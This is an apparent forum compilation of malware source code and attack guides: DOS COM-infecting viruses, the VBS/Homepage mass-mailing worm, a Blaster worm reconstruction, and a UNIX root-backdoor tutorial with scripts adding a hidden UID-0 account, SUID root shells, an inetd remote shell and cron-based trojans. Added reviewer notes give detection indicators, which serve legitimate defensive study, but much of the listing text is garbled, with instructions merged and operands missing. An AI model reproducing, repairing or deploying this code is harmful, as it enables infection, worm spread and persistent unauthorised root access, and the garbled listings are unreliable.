Mov Dx,80h
Int 21h
Pop Ax
(16)Retf                        ; "(16)" is a fused page marker; far return - target depends on the initial stack (confirm)
Close: Pop Si                   ; keep the return address while popping the saved values
Pop Dx
Pop Cx
Mov Ax,5701h                    ; restore date/time
Int 21h
Mov Ah,3eh                      ; close handle
Int 21h
Mov Ax,4301h                    ; restore attributes
Pop Cx
Mov Dx,0fd1eh
Int 21h
Push Si
Ret
CallPtr Db 0e9h,0,0             ; JMP rel16 stub; displacement patched in Infect
FileSpec
Db '*.COM',0                    ; first byte '*' is the 4th byte written with CallPtr = the infection marker
OrgPrg: Int 20h                 ; default saved host bytes for a first-generation copy: INT 20h + 2 NOPs
Nop
Nop
VirLen Equ $-MainVir
;
********************************************************
********************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
(17); ;
; *** NOT FOR GENERAL DISTRIBUTION ***
;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be
Passed ;
; Around Among the General Public It Will be Very Useful for
Learning how ;
; Viruses Work and Propagate But Anybody With Access to an
Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly
Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it
Already ;
; Is Keep This Code in Responsible Hands! ;
; ;
;
********************************************************
********************;
;────────────────────────────────────────────────────────────────────────────;
;──────────────────> and Remember Don't Forget to Call <────────────────────;
;────────────> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <────────────;
;────────────────────────────────────────────────────────────────────────────;
MÃ NGUỒN CỦA VIRUS HOME PAGE (source code of the VBS/Homepage worm)
'Homepage Created By Robinhood
' === Malware sample: VBS/Homepage mass-mailer (2001, VBSWG-style), kept for analysis only ===
' The text came out of a quoted-printable e-mail: "=3D" stands for "=", "=20" for a
' trailing space and a bare "=" at line end is a soft line break, so the listing is not
' valid VBScript as shown and must not be "decoded" into a working script. Several
' lines are missing outright (the Run key path at regwrite, the creation of mailitem/myadd).
' Behaviour visible here: copies itself to %SYSTEM%\Win32.dll.vbs, registers a
' HKLM\...\Run\Win32dll = "wscript.exe <path> %" value and keeps re-creating both the file
' and the value in an endless loop; mails itself to every Outlook address-list entry
' (subject "Very Important!", the "Attachments" property name spelled with Chr() calls);
' drops a mIRC script.ini that DCC-sends the file to anyone joining a channel; and with a
' one-in-five chance opens http://www.virii.com.ar (the "payload").
' Detection / IR: the file name and Run value above, a modified mirc*\script.ini, and
' outbound mail bursts with that subject.
Set FSO =3D createobject("scripting.filesystemobject")
dirsystem =3D FSO.getspecialfolder(1)
Path=3D dirsystem & "\Win32.dll.vbs"
Set WSH createobject("wscript.shell")
' autorun value (the key path argument is missing here: the line was cut by the mail encoding)
WSH.regwrite
"wscript.exe " & Path& " %"
FSO.copyfile wscript.scriptfullname, Path
' "payload=20" is quoted-printable for "payload " - a call to payload() below
payload=20
' spread switches are read from registry values; where they are set is not visible here
If =
WSH.regread("HKLM\SOFTWARE\Microsoft\Windows\Curre
ntVersion\Homepage\Send
mail") <> then
sendmail
End if
If
WSH.regread("HKLM\SOFTWARE\Microsoft\Windows\Curre
ntVersion\Homepage\IRC"
) <> then
IRC ""
End if
' keep own source in memory so the file can be re-created if it is deleted
Set sourcefile=3D FSO.opentextfile(wscript.scriptfullname)
sourcetext sourcefile.readall
sourcefile.close
' watchdog loop (never exits): re-drop the file and the Run value
Do
if not(FSO.fileexists(wscript.scriptfullname)) then
set filebackup=3D FSO.createtextfile(wscript.scriptfullname)
filebackup.write sourcetext
filebackup.close
end if
sWSH.regread("HKLM\SOFTWARE\Microsoft\Windows\Curr
entVersion\Run\Win32dll"
)
If s<> "wscript.exe " & Path& " %" then
WSH.regwrite =
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n\Win32dll", "wscript.exe
" & Path& " %"
end if
s=3D ""
loop=20
' Outlook/MAPI mass-mailer: one message per address-list entry
Function sendmail()
Set myapp =3D CreateObject("Outlook.Application")
If myapp =3D "Outlook" Then
Set myname =3D myapp.GetNameSpace("MAPI")
Set myaddlists =3D myname.AddressLists
For Each myaddlist In myaddlists
If myaddlist.AddressEntries.Count <> Then
x =3D myaddlist.AddressEntries.Count
For i =3D To x
' "(19)" is a fused page marker; the lines creating mailitem and myadd are missing
(19)mailitem.To =3D myadd.Address
mailitem.Subject =3D "Very Important!"
mailitem.Body =3D "Hi:" & vbcrlf & "Please view this file, it's very
important." & vbcrlf & ""
' "Attachments" spelled with Chr() codes and run through Execute, presumably to defeat simple signatures
execute "set myatts =3Dmailitem." & Chr(65) & Chr(116) & Chr(116) &
Chr(97) & Chr(99) & Chr(104) & Chr(109) & Chr(101) & Chr(110) & Chr(116)
& Chr(115)
copypath Path
mailitem.DeleteAfterSubmit True
myatts.Add copypath
If mailitem.To <> "" Then
mailitem.Send
End If
Next
End If
Next
End If
End function
' mIRC propagation: write a script.ini that DCC-sends the worm file to every user joining a channel
Function IRC(ircpath)
If ircpath <> "" Then
programpath
WSH.regread("HKEY_LOCAL_MACHINE\Software\Microsoft
\Windows\CurrentVersion
\ProgramFilesDir")
If FSO.fileexists("c:\mirc\mirc.ini") Then
ircpath =3D "c:\mirc"
ElseIf FSO.fileexists("c:\mirc32\mirc.ini") Then
ircpath =3D "c:\mirc32"
ElseIf FSO.fileexists(programpath & "\mirc\mirc.ini") Then
ircpath =3D programpath & "\mirc"
ElseIf FSO.fileexists(programpath & "\mirc32\mirc.ini") Then
ircpath =3D programpath & "\mirc"
Else
ircpath =3D ""
End If
End If
If ircpath <> "" Then
Set ircscript =3D FSO.CreateTextFile(ircpath & "\script.ini", True)
text =3D "[script]" & vbCrLf & "n0=3Don 1:JOIN:#:{"
text =3D text & vbCrLf & "n0=3Don 1:JOIN:#:{"
text =3D text & vbCrLf & "n1=3D /if ( $nick =3D=3D $me ) { halt }"
text =3D text & vbCrLf & "n2=3D /." & Chr(100) & Chr(99) & Chr(99) & "
send $nick "
text =3D text & Path
' "(20)" is a fused page marker; the write of "text" to the file is not visible here
(20)ircscript.Close
End If
End Function=20
' "payload": one-in-five chance per run of opening a web page (the compared constant was lost)
Function payload()
Randomize
If + Int(Rnd * 5) =3D then
WSH.run "Http://www.virii.com.ar",false
end if
end function
; virus from ALT-11 mag
; -;
; Coded by: Azagoth
; -; Assemble using Turbo Assembler:
; tasm /m2 <filename>.asm ; tlink /t <filename>.obj ;
-; - Non-Overwriting COM infector (excluding COMMAND.COM) ; - COM growth: XXX bytes
; - It searches the current directory for uninfected files If none are
; found, it searches previous directory until it reaches root and no more
; uninfected files are found (One infection per run) ; - Also infects read-only files
; - Restores attributes, initial date/time-stamps, and original path ;
; --- Analysis notes (reviewer) ---
; Azagoth's COM appender (ALT-11 mag): non-overwriting, skips COMMAND.COM by name, walks
; up from the current directory towards the root until it finds an uninfected *.COM,
; infects one file per run (tracked by "infections" vs "max_infections"), restores
; attributes, timestamps, the DTA and the original path, then returns control to the host
; via a jmp to cs:100h. Infection marker: the last two bytes of a victim equal virus_id
; ('AZ'). Attributes searched include hidden/system/read-only (search_attrib 00100111b).
; THIS LISTING IS BADLY GARBLED by extraction: instructions were merged onto lines and now
; sit inside earlier ";" comments, labels are fused to the preceding instruction (e.g.
; "jmp find_next bomb:"), most immediate operands are gone ("mov cx, ", "sub dx, ", "db "),
; and previous_dir shows as ' ' (presumably '..'). It cannot be assembled and should not
; be reconstructed; it is useful only to illustrate the directory-walk and tail-marker
; technique.
.model tiny code
org 100h ; adjust for psp start:
call get_disp ; push ip onto stack get_disp:
pop bp ; bp holds current ip sub bp, offset get_disp ; bp = code displacement ; original label offset is stored in machine code
(21)mov ah, 47h ; save cwd
xor dl, dl ; = default drive lea si, [bp + org_path]
int 21h get_dta:
mov ah, 2fh int 21h
mov [bp + old_dta_off], bx ; save old dta offset set_dta: ; point to dta record mov ah, 1ah
lea dx, [bp + dta_filler] int 21h
; --- find the first/next *.COM; on failure cd to previous_dir and retry until root ---
search:
mov ah, 4eh ; find first file
mov cx, [bp + search_attrib] ; if successful dta is lea dx, [bp + search_mask] ; created
int 21h
jnc clear_attrib ; if found, continue find_next:
mov ah, 4fh ; find next file int 21h
jnc clear_attrib still_searching:
mov ah, 3bh
lea dx, [bp + previous_dir] ; cd int 21h
jnc search
jmp bomb ; at root, no more files clear_attrib:
mov ax, 4301h
xor cx, cx ; get rid of attributes lea dx, [bp + dta_file_name]
int 21h open_file:
mov ax, 3D02h ; AL=2 read/write lea dx, [bp + dta_file_name]
int 21h
xchg bx, ax ; save file handle ; bx won't change from now on
; --- exclusions: COMMAND.COM by name, then the 'AZ' tail marker ---
check_if_command_com: cld
lea di, [bp + com_com]
lea si, [bp + dta_file_name]
(22)repe cmpsb ; repeat while equal jne check_if_infected
jmp close_file check_if_infected:
mov dx, word ptr [bp + dta_file_size] ; only use first word since
; COM file sub dx, ; file size - mov ax, 4200h
mov cx, ; cx:dx ptr to offset from
int 21h ; origin of move
mov ah, 3fh ; read last characters mov cx,
lea dx, [bp + last_chars] int 21h
mov ah, [bp + last_chars] cmp ah, [bp + virus_id] jne save_3_bytes
mov ah, [bp + last_chars + 1] cmp ah, [bp + virus_id + 1] jne save_3_bytes
jmp close_file save_3_bytes:
mov ax, 4200h ; 00=start of file xor cx, cx
xor dx, dx int 21h mov ah, 3Fh mov cx,
lea dx, [bp + _3_bytes] int 21h
; --- append the body at EOF, patch a jmp over the first bytes, bump the counter ---
goto_eof:
mov ax, 4202h ; 02=End of file
xor cx, cx ; offset from origin of move
xor dx, dx ; (i.e nowhere) int 21h ; ax holds file size ; since it is a COM file, overflow will not occur
save_jmp_displacement:
sub ax, ; file size - = jmp disp
mov [bp + jmp_disp], ax write_code:
(23)mov cx, virus_length ;*** equate lea dx, [bp + start]
int 21h goto_bof:
mov ax, 4200h xor cx, cx xor dx, dx int 21h
write_jmp: ; to file mov ah, 40h
mov cx,
lea dx, [bp + jmp_code] int 21h
inc [bp + infections] restore_date_time:
mov ax, 5701h
mov cx, [bp + dta_file_time] mov dx, [bp + dta_file_date] int 21h
; --- stealth clean-up: close, then put the original attributes back ---
close_file:
mov ah, 3eh int 21h restore_attrib:
xor ch, ch
mov cl, [bp + dta_file_attrib] ; restore original attributes
mov ax, 4301h
lea dx, [bp + dta_file_name] int 21h
done_infecting?:
mov ah, [bp + infections] cmp ah, [bp + max_infections] jz bomb
jmp find_next bomb:
; cmp bp,
; je restore_path ; original run ;
; Stuff deleted restore_path:
(24)mov ah, 3bh ; cd to original path lea dx, [bp + org_path]
int 21h restore_dta:
mov ah, 1ah
mov dx, [bp + old_dta_off] int 21h
restore_3_bytes: ; in memory lea si, [bp + _3_bytes]
mov di, 100h
cld ; auto-inc si, di mov cx,
rep movsb return_control_or_exit?:
cmp bp, ; bp = if original run je exit
mov di, 100h ; return control back to prog
jmp di ; -> cs:100h exit:
mov ax, 4c00h int 21h
; Variable Declarations
-old_dta_off dw ; offset of old dta address
; - dta record
dta_filler db 21 dup (0) dta_file_attrib db
dta_file_time dw dta_file_date dw dta_file_size dd
dta_file_name db 13 dup (0)
; -search_mask db '*.COM',0 ; files to infect: *.COM search_attrib dw 00100111b ; all files a,s,h,r com_com db 'COMMAND.COM'
previous_dir db ' ',0 root db '\',0
org_path db 64 dup (0) ; original path infections db ; counter
max_infections db
(25)last_chars db 0, ; last chars = ID ? virus_id db 'AZ'
eov: ; end of virus virus_length equ offset eov - offset start
end start
; --- Analysis notes (reviewer) ---
; Tiny (VSize = 85h bytes) COM infector. It appears to be memory-resident: the start-up
; code copies itself to a low fixed segment (the comments say DS/ES = 60h, ES is loaded
; from CX = 50h) and installs an INT 21h hook whose body follows StartFile (its label was
; lost in extraction), chaining to the original handler through INT 69h (see
; "jmp dword ptr cs:[69h * 4]" and every "int 69h" below). Confirm against a clean copy.
; Infection path inside the hook: open the file read/write, read its first bytes, skip when
; the first byte is 4Dh ("MZ" EXE header or its own 4D E9 infection mark), seek to end,
; append VSize bytes, then write a 4D E9 <size> header at offset 0 (stosw of 0E94Dh then
; the file size). "Bytes db 0CDh,20h,90h,90h" is the stand-in for the host's original
; first bytes in a first-generation copy. Extraction collapsed instructions and labels
; onto shared lines and dropped operands ("org ", "mov al, ", "mov cl, "), so this is not
; assemblable; do not reconstruct.
VSize=085h
Code Segment
Assume CS:Code org
db 4Dh jmp Start Org 600h
Bytes db 0CDh,20h,90h,90h Start: mov si, 0100h
mov bx, offset Int21 mov cx, 0050h
mov di, si add si, [si+2] push di
movsw movsw
mov es, cx cmpsb
je StartFile dec si
dec di rep movsw
mov es, cx xchg ax, bx xchg ax, cx Loop0: xchg ax, cx
xchg ax, word ptr es:[di-120h] stosw
jcxz Loop0 xchg ax, bx StartFile:
push ds pop es ret
; --- interrupt-hook body (label lost); "(26)" is a fused page marker ---
(26)push bx push dx push ds push es
mov ax, 3D02h call DoInt21 jc EndExec
cbw ;Zero AH cwd ;Zero DX
mov bx, si ;Move handle to BX mov ds, ax ;Set DS and ES to 60h, mov es, ax ;the virus data segment mov ah, 3Fh ;Read first bytes int 69h
mov al, 4Dh
scasb ;Check for 4D5Ah or infected file mark
je Close ;.EXE or already infected mov al,
call LSeek ;Seek to the end, SI now contains file size
mov cl, VSize ;Virus size in CX, prepare to write
int 69h ;AH is 40h, i.e Write operation mov ax, 0E94Dh ;Virus header in AX
stosw ;Store it
xchg ax, si ;Move file size in AX stosw ;Complete JMP instruction xchg ax, dx ;Zero AX
call LSeek ;Seek to the beginning
int 69h ;AH is 40h, write the virus header
Close: mov ah,3Eh ;Close the file int 69h
EndExec: pop es pop ds pop dx pop bx pop ax
End21: jmp dword ptr cs:[69h * 4]
LSeek: mov ah, 42h ;Seek operation cwd ;Zero DX
DoInt21: xor cx, cx ;External entry for Open, zero cx
int 69h
mov cl, ;4 bytes will be read/written xchg ax, si ;Store AX in SI
mov ax, 4060h ;Prepare AH for Write xor di, di ;Zero DI
End ;
──────────────────────────────────────────────────────────────────────────
; ────────────────────> and Remember Don't Forget to Call <────────────────
; ────────────> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <──────────
;
──────────────────────────────────────────────────────────────────────────
Virus MSBlaster Source Code
Cái này assemble mà save dạng .vbs, "you excluding COMMAND.COM" — không biết phải không ta?
(Forum reply, roughly: "This one is assembled but saved as .vbs? And it 'excludes COMMAND.COM' — not sure that's right." The poster then re-quotes the Azagoth header below.)
Coded by: Azagoth
;
-; Assemble using Turbo Assembler:
; tasm /m2 <filename>.asm
; tlink /t <filename>.obj
;
-; - Non-Overwriting COM infector (excluding COMMAND.COM)
; - COM growth: XXX bytes
; - It searches the current directory for uninfected files If none are
; found, it searches previous directory until it reaches root and no more
; uninfected files are found (One infection per run)
; - Also infects read-only files
; - Restores attributes, initial date/time-stamps, and original path.
; -
Muốn lấy thì nè (here it is, if you want it):
// --- Analysis notes (reviewer) ---
// This is the widely circulated C-like reconstruction of W32/Blaster (August 2003), not
// the worm's real source: the author deliberately left spreadworm() and payload() empty
// (Blaster's RPC/DCOM exploit over 135/tcp and its TFTP self-serve on 69/udp are not
// present here), and extraction mangled it further ("// mainint main(){" comments out the
// main() signature, "LPWSADATA WSAData", etc.). It does not compile; do not repair.
// What the visible body does: persistence via HKLM\...\Run "windows auto update" =
// msblast.exe; single-instance mutex "BILLY" (exit on ERROR_ALREADY_EXISTS 0xb7); waits
// for Internet connectivity; picks a target range from the local /16 (C octet lowered by
// up to 0x14) or a random one; starts the payload thread after the 15th of the month or
// from September (the DoS the comment mentions); then loops on spreadworm() forever.
// Detection / IR indicators: the Run value, the mutex name, msblast.exe on disk, and
// date-gated traffic spikes from infected hosts.
/* global variables*/char Filename[SOME_CONST];DWORD i_ip_A;DWORD
i_ip_B;DWORD i_ip_C;DWORD i_ip_D;DWORD i_ip_D_?;/* Deliberately left blank
This function listens on ports 69 and 135 for incoming connections It then tries to spread
itself It might have spread faster had it done a progressive network scan.*/void
spreadworm(){}/* Deliberately left blank Was designed to a DoS attack on
(28)attacking windowsupdate.microsoft.com or microsoft.com for real entertainment
value.*/SEC_THREAD_START payload(){}// mainint main(){ in_addr in; DWORD
temp_ip_buf; hostent _hostent; char local_ip_address[0x200], month[3],
day_of_month[3]; LPWSADATA WSAData; HKEY hKey; DWORD ThreadId; bool
status; /* Registry Key manipulation We create the key if it doesn't exist, otherwise it is
opened Then we give the value "msblast.exe" to the key "windows auto update"
Windows Auto Update is now set to run on boot up, which will run MSBlast.exe */
// persistence: 0x80000002 = HKEY_LOCAL_MACHINE, 0xf003f = KEY_ALL_ACCESS, type 1 = REG_SZ
RegCreateKeyExA(0x80000002,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run ", 0, 0, 0, 0xf003f, 0, & hKey,
0); RegSetValueExA(hKey, "windows auto update", 0, 1, "msblast.exe", 0x32);
RegCloseKey(hKey); /* Check to see if an instance of MSBlast.exe is already running, if
there is one running then this instance exits */ CreateMutexA(0, 1, "BILLY"); if
(GetLastError() == 0xb7) ExitProcess(0); if ((WSAStartup(0x202, & WSAData) != 0) ||
(WSAStartup(0x101, & WSAData) != 0) || (WSAStartup(0x001, & WSAData) != 0))
return -1; /* We need to know where MSBlast.exe is located so that we can redistribute it.
*/ GetModuleFileNameA(0, &Filename, 0x104); /* Idle Event We wait for a connection
to the internet to be established before we can proceed */ while
(InternetGetConnectedState(& ThreadId, 0) == 0) Sleep(0x4e20); /* Generate Random IP
Address */ i_ip_D = 0; srand(GetTickCount()); randomip_A = rand() % 0xFE;
randomip_A++; randomip_B = rand() % 0xFE; /* Get Host Machine IP */ if
(gethostname(& local_ip_address, 0x200) != ffffffff) { _hostent = gethostbyname(&
local_ip_address); if (_hostent != 0) { if (_hostent.hlength != 0) { memcpy( &in,
&_hostent.hlength, 4); sprintf(&local_ip_address, "%s", inet_ntoa(in.S_un));
temp_ip_buf = strtok(&local_ip_address, "."); /* Split ip address into A.B.C.(D) */
i_ip_A = atoi(temp_ip_buf); temp_ip_buf = strtok(0, "."); i_ip_B = atoi(temp_ip_buf);
temp_ip_buf = strtok(0, "."); i_ip_C = atoi(temp_ip_buf); if (i_ip_C > 0x14)
{ srand(GetTickCount()); i_ip_C -= rand() % 0x14; } /* Don't use Random IP Addresses
*/ randomip_A = i_ip_A; randomip_B = i_ip_B; status = true; } } }
// target selection: 12 times out of 20 the local-range choice is discarded for a random A.B.C
srand(GetTickCount()); if ((rand() % 0x14) < 12) status = 0; i_ip_D_? = 1; if ((rand %
0xA) > 7) i_ip_D_? = 2; if (status == 0) { i_ip_A = rand() % 0xFE; i_ip_A++; i_ip_B =
rand() % 0xFE; i_ip_C = rand() % 0xFE; } /* Get Date */ GetDateFormatA(0x409, 0, 0,
&"d", &day_of_month, 3); GetDateFormatA(0x409, 0, 0, &"M", &month, 3); /* Payload.
Run payload() if the date is right ??? */ if ( (atoi(& day_of_month) > 15) || (atoi(& month)
> 8) ) CreateThread(0, 0, payload, 0, 0, &ThreadId); /* Spreadworm */ while (1)
// main loop: never returns; everything after it is dead code
spreadworm(); /* Sense of Humour The remainder of the code will never get executed */
WSACleanup(); return 0;}
Làm vài backdoor chơi. Sau đây là hướng dẫn viết backdoor cọp-py (copy) trên mạng. Dốt tiếng Anh nên không dám dịch, sợ dịch sai không thấy backdoor đâu mà lại chết :> Có bác nào siêu English dịch giùm nhá.
(Roughly: "Let's play with a few backdoors. What follows is a UNIX-backdoor guide copied from the net; my English is poor so I did not translate it — someone fluent, please do.")
Ok. You've been at it all night, trying all the exploits you can think of. The system seems tight. The system looks tight.
The system *is* tight. You've tried everything: default passwds, guessable passwds, NIS weaknesses, NFS holes, incorrect
permissions, race conditions, SUID exploits, Sendmail bugs, and so on. Nothing. WAIT! What's that!?!? A "#" ???? Finally!
After seemingly endless toiling, you've managed to steal root. Now what? How do you hold onto this precious super-user
privilege you have worked so hard to achieve?
This article is intended to show you how to hold onto root once you have it. It is intended for hackers and administrators alike.
From a hacking perspective, it is obvious what good this paper will do you. Admins can likewise benefit from this paper. Ever
wonder how that pesky hacker always manages to pop up, even when you think you've completely eradicated him from your
system?
This list is BY NO MEANS comprehensive. There are as many ways to leave backdoors into a UNIX computer as there are
ways into one.

Beforehand

Know the location of critical system files. This should be obvious. (If you can't list any off the top of your head, stop reading
now, get a book on UNIX, read it, then come back to me.) Be familiar with passwd file formats (including general field
format, system-specific naming conventions, shadowing mechanisms, etc.). Know vi. Many systems will not have those
robust, user-friendly editors such as Pico and Emacs. Vi is also quite useful when you need to quickly search and edit a large file. If
you are connecting remotely (via dial-up/telnet/rlogin/whatever) it's always nice to have a robust terminal program that has a
nice, FAT scrollback buffer. This will come in handy if you want to cut and paste code, rc files, shell scripts, etc.
The permanence of these backdoors will depend completely on the technical savvy of the administrator. The experienced and
skilled administrator will be wise to many (if not all) of these backdoors. But, if you have managed to steal root, it is likely the admin isn't as skilled (or up to date on bug reports) as she should be, and many of these doors may be in place for some time
to come. One major thing to be aware of is the fact that if you can cover your tracks during the initial break-in, no one will be
looking for back doors.
The Overt
[1] Add a UID 0 account to the passwd file. This is probably the most obvious and quickly discovered method of re-entry. It
[text lost in extraction] … prepend or append it. Anyone casually examining the passwd file will see this. So, why not stick it in the middle?
#!/bin/csh
# Inserts a UID account into the middle of the passwd file
# There is likely a way to this in 1/2 a line of AWK or SED Oh well
# daemon9@netcom.com
# --- Reviewer notes (attacker persistence technique, shown for defenders) ---
# The script splits /etc/passwd in two and appends an extra uid 0 / gid 0 user
# ("EvilUser", empty password field, csh login) at the join, so a glance at the head or
# tail of the file does not show it. Extraction collapsed several commands into the
# trailing "#" comments (the cp/echo/cat lines) and dropped the numeric operands of the
# "@" arithmetic lines; do not reconstruct.
# Detection: any entry besides root with uid 0 is a finding:
#     awk -F: '$3 == 0 && $1 != "root"' /etc/passwd
# Also alert on an empty second field, on /etc/passwd mtime/inode changes that do not
# match an admin action, and on leftover split artefacts (/xaa, /xab, /temppass).
set linecount = `wc -l /etc/passwd`
cd # Do this at home cp /etc/passwd /temppass # Safety first echo passwd file has $linecount[1] lines
@ linecount[1] /=
@ linecount[1] += # we only want temp files echo Creating two files, $linecount[1] lines each \(or approximately that\)
split -$linecount[1] /temppass # passwd string optional echo "EvilUser::0:0:Mr Sinister:/home/sweet/home:/bin/csh" >> /xaa cat /xab >> /xaa
mv /xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand rm /xa* /temppass
echo Done
NEVER, EVER, change the root password The reasons are obvious
[2] In a similar vein, enable a disabled account as UID 0, such as Sync. Or, perhaps, an account somewhere buried deep in the
passwd file has been abandoned, and disabled by the sysadmin. Change her UID to (and remove the '*' from the second
field).
[3] Leave an SUID root shell in /tmp #!/bin/sh
# Everyone's favorite
# NOTE(review): a setuid-root copy of a shell dropped as a dotfile in /tmp.
# The text that follows names the mitigations: mount /tmp nosuid and sweep it
# on a schedule.  More generally, keep a baseline of setuid binaries
# (find / -perm -4000) and alert on any addition to it.
cp /bin/csh /tmp/.evilnaughtyshell # Don't name it that chmod 4755 /tmp/.evilnaughtyshell
Many systems run cron jobs to clean /tmp nightly. Most systems clean /tmp upon a reboot. Many systems have /tmp mounted
to disallow SUID programs from executing. You can change all of these, but if the filesystem starts filling up, people may
notice (but, hey, this *is* the overt section). I will not detail the changes necessary because they can be quite system
specific. Check out /var/spool/cron/crontabs/root and /etc/fstab.
The Veiled
(31)background info: The Internet daemon (/etc/inetd) listens for connection requests on TCP and UDP ports and spawns the
appropriate program (usually a server) when a connection request arrives. The format of the /etc/inetd.conf file is simple. Typical
lines look like this:
(1) (2) (3) (4) (5) (6) (7) ftp stream tcp nowait root /usr/etc/ftpd ftpd talk dgram udp wait root /usr/etc/ntalkd ntalkd
Field (1) is the daemon name that should appear in /etc/services This tells inetd what to look for in /etc/services to determine
which port it should associate the program name with (2) tells inetd which type of socket connection the daemon will expect
TCP uses streams, and UDP uses datagrams Field (3) is the protocol field which is either of the two transport protocols, TCP
or UDP Field (4) specifies whether or not the daemon is iterative or concurrent A 'wait' flag indicates that the server will
process a connection and make all subsequent connections wait 'Nowait' means the server will accept a connection, spawn a
child process to handle the connection, and then go back to sleep, waiting for further connections. Field (5) is the user (or more
importantly, the UID) that the daemon is run as. (6) is the program to run when a connection arrives, and (7) is the actual
command (and optional arguments). If the program is trivial (usually requiring no user interaction) inetd may handle it internally.
This is done with an 'internal' flag in fields (6) and (7).
So, to install a handy backdoor, choose a service that is not used often, and replace the daemon that would normally handle it
with something else A program that creates an SUID root shell, a program that adds a root account for you in the /etc/passwd
file, etc
For the insinuation-impaired, try this:
Open the /etc/inetd.conf in an available editor Find the line that reads:
daytime stream tcp nowait root internal and change it to:
daytime stream tcp nowait /bin/sh sh -i
You now need to restart /etc/inetd so it will reread the config file. It is up to you how you want to do this. You can kill and
restart the process, (kill -9 , /usr/sbin/inetd or /usr/etc/inetd) which will interrupt ALL network connections (so it is a good idea
to do this off peak hours).
[5] An option to compromising a well known service would be to install a new one, that runs a program of your choice One
(32)/etc/services as well as in /etc/inetd.conf The format of the /etc/services file is simple:
(1) (2)/(3) (4) smtp 25/tcp mail
Field (1) is the service, field (2) is the port number, (3) is the protocol type the service expects, and (4) is the common name
associated with the service For instance, add this line to /etc/services:
evil 22/tcp evil and this line to /etc/inetd.conf:
evil stream tcp nowait /bin/sh sh -i Restart inetd as before
Note: Potentially, these are VERY powerful backdoors. They not only offer local re-entry from any account on the system,
they offer re-entry from *any* account on *any* computer on the Internet. [6] Cron-based trojan I. Cron is a wonderful system administration tool. It is also a wonderful tool for backdoors, since root's
crontab will, well, run as root Again, depending on the level of experience of the sysadmin (and the implementation), this
backdoor may or may not last. /var/spool/cron/crontabs/root is where root's list for crontabs is usually located. Here, you have
several options I will list a only few, as cron-based backdoors are only limited by your imagination Cron is the clock daemon
It is a tool for automatically executing commands at specified dates and times Crontab is the command used to add, remove,
or view your crontab entries It is just as easy to manually edit the /var/spool/crontab/root file as it is to use crontab A crontab
entry has six fields:
(1) (2) (3) (4) (5) (6)
* * /usr/bin/updatedb
Fields (1)-(5) are as follows: minute (0-59), hour (0-23), day of the month (1-31) month of the year (1-12), day of the week
(0-6) Field (6) is the command (or shell script) to execute The above shell script is executed on Mondays To exploit cron,
simply add an entry into /var/spool/crontab/root For example: You can have a cronjob that will run daily and look in the
/etc/passwd file for the UID account we previously added, and add him if he is missing, or nothing otherwise (it may not
be a bad idea to actually *insert* this shell code into an already installed crontab entry shell script, to further obfuscate your shady intentions) Add this line to /var/spool/crontab/root:
(33)#!/bin/csh
# Is our eviluser still on the system? Let's make sure he is #daemon9@netcom.com
# NOTE(review): re-creates the UID-0 "EvilUser" passwd entry whenever grep no
# longer finds it, so deleting the account alone does not remove the foothold.
# Defender's view: the indicator is a root crontab entry (or a script it calls)
# that reads and rewrites /etc/passwd.  Review root's crontab and every script it
# references against a known baseline, and alert on writes to /etc/passwd that
# do not come from the package manager or the useradd/usermod tooling.
# As with the earlier copy of this script, the listing is line-collapsed by
# extraction and the operands of the "@" expressions are missing.
set evilflag = (`grep eviluser /etc/passwd`)
if($#evilflag == 0) then # Is he there?
set linecount = `wc -l /etc/passwd`
cd # Do this at home cp /etc/passwd /temppass # Safety first @ linecount[1] /=
@ linecount[1] += # we only want temp files
split -$linecount[1] /temppass # passwd string optional echo "EvilUser::0:0:Mr Sinister:/home/sweet/home:/bin/csh" >> /xaa
cat /xab >> /xaa mv /xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm /xa* /temppass echo Done
else endif
[7] Cron-based trojan II This one was brought to my attention by our very own Mr Zippy For this, you need a copy of the
/etc/passwd file hidden somewhere In this hidden passwd file (call it /var/spool/mail/.sneaky) we have but one entry, a root
account with a passwd of your choosing We run a cronjob that will, every morning at 2:30am (or every other morning), save a
copy of the real /etc/passwd file, and install this trojan one as the real /etc/passwd file for one minute (synchronize swatches!)
Any normal user or process trying to login or access the /etc/passwd file would get an error, but one minute later, everything
would be ok Add this line to root's crontab file: 29 * * * /bin/usr/sneakysneaky_passwd
make sure this exists:
#echo "root:1234567890123:0:0:Operator:/:/bin/csh" > /var/spool/mail/.sneaky
and this is the simple shell script: #!/bin/csh
# NOTE(review): swaps the real /etc/passwd for the one-entry root-only file kept
# in /var/spool/mail/.sneaky for 60 seconds on every run, then restores it.
# Defender's view: logins and name lookups failing for one minute at the same
# time each day, /etc/passwd's mtime changing on a schedule, a stray backup at
# /etc/.temppass and a hidden dotfile in the mail spool are all tells; FIM on
# /etc/passwd plus a baseline of root's crontab catches the pattern.
# The "(34)" on the next line is a page marker left by extraction, not code.
(34)cp /etc/passwd /etc/.temppass
cp /var/spool/mail/.sneaky /etc/passwd sleep 60
mv /etc/.temppass /etc/passwd
[8] Compiled code trojan Simple idea Instead of a shell script, have some nice C code to obfuscate the effects Here it is
Make sure it runs as root Name it something innocous Hide it well /* A little trojan to create an SUID root shell, if the proper argument is
given C code, rather than shell to hide obvious it's effects */ /* daemon9@netcom.com */
/* NOTE(review): the listing is line-collapsed by extraction and the #include
 * directive lost its header name; it is reproduced here as printed.
 * Defender's view: the three system() calls guarded by the keyword compare are
 * the entire payload -- a setuid-root copy of csh dropped as a dotfile in /bin.
 * The progress dots and sleep() are cosmetic.  A setuid-binary baseline
 * (find / -perm -4000), file-integrity monitoring on /bin, and auditing for
 * chown-to-root / chmod 4755 performed by anything other than the package
 * manager all surface this regardless of what the binary is named. */
#include
#define KEYWORD "industry3" #define BUFFERSIZE 10 int main(argc, argv) int argc;
char *argv[];{ int i=0;
if(argv[1]){ /* we've got an argument, is it the keyword? */
